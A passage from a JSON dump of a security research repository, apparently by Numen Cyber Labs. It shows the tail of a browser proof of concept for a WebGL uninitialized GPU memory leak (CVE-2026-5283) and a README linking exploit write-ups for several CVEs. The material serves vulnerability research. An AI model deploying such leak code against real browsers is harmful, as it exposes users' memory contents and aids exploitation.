ctx.putImageData(img,0,0);ctx.fillStyle='#fff';ctx.font='11px monospace';\n    ctx.fillText('Layer '+layer,5,12);\n}\n\nL('\\n'+'='.repeat(60));\nif(totalLeaked>0){\n    L('<span class=\"red\">CVE-2026-5283: '+totalLeaked+' bytes leaked from '+leakedData.length+' layers</span>');\n    L('Check above for page-aligned addresses, GPU VA ranges, descriptor pairs');\n    document.title='LEAK';\n}else{\n    L('<span class=\"grn\">Not vulnerable</span>');\n    document.title='OK';\n}\nL('GL error: 0x'+gl.getError().toString(16));\ngl.deleteTexture(tex2);\n</script>\n</body>\n</html>\n"
  },
  {
    "path": "README.md",
    "content": "---\n## The PoC/Exploit of some interesting vulnerabilities\n### Author: Vulnerability Research Team of Numen Cyber Labs\n---\n\n1. TCP/IP RCE Vulnerability (CVE-2022–34718) PoC Restoration and Analysis  \nhttps://medium.com/@numencyberlabs/analysis-and-summary-of-tcp-ip-protocol-remote-code-execution-vulnerability-cve-2022-34718-8fcc28538acf\n\n2. CVE-2022–36537 Vulnerability Technical Analysis with Exploit  \nhttps://medium.com/@numencyberlabs/cve-2022-36537-vulnerability-technical-analysis-with-exp-667401766746\n\n3. CVE-2021-38003：From Leaking TheHole to Chrome Renderer RCE  \n https://medium.com/numen-cyber-labs/from-leaking-thehole-to-chrome-renderer-rce-183dcb6f3078\n\n4. CVE-2022–42889：Text4Shell Vulnerability Technical Analysis  \n https://medium.com/@numencyberlabs/text4shell-or-act4shell-vulnerability-analysis-a860d141e3e5\n\n5. Zero Day Vulnerability: Chromium v8 js engine issue 1303458 — Use After Free in x64 Instruction Optimization Vulnerability Analysis  \nhttps://medium.com/bugbountywriteup/zero-day-vulnerability-chromium-v8-js-engine-issue-1303458-use-after-free-in-x64-instruction-e874419436a6\n\n6. CVE-2022-3723： based on google's public poc\nhttps://medium.com/@numencyberlabs/use-native-pointer-of-function-to-bypass-the-latest-chrome-v8-sandbox-exp-of-issue1378239-251d9c5b0d14\n\n7. CVE-2023-41047: OctoPrint Remote Code Execution Vulnerability\nhttps://medium.com/@numencyberlabs/octoprint-remote-code-execution-vulnerability-7e36372d6c2b\n\n8. CVE-2024-24919: Check Point Security Gateways_Arbitrary File Read Vulnerability\nhttps://medium.com/@numencyberlabs/cve-2024-24919-check-point-security-gateways-arbitrary-file-read-vulnerability-f33b296be408\n\n9. CVE-2026–5283: Uninitialized GPU Memory Disclosure via Partial Clear in ANGLE (Chrome WebGL)\nhttps://medium.com/@numencyberlabs/cve-2026-5283-uninitialized-gpu-memory-disclosure-via-partial-clear-in-angle-chrome-webgl-3740ca481149\n---\n## The Analysis of Web3-related vulnerabilities\n### Discovered by Numen Web3 security products\n### Author: Web3 Security Team of Numen Cyber Labs\n---\n\n1. Analysis of the First Critical Vulnerability of Aptos Move VM  \nhttps://medium.com/numen-cyber-labs/analysis-of-the-first-critical-0-day-vulnerability-of-aptos-move-vm-8c1fd6c2b98e\n\n2. The Story of a High-Risk Vulnerability in Move Reference Safety Verify Module  \nhttps://medium.com/numen-cyber-labs/the-story-of-a-high-vulnerability-in-move-reference-safety-verify-module-2340f3d8c642\n\n"
  }
]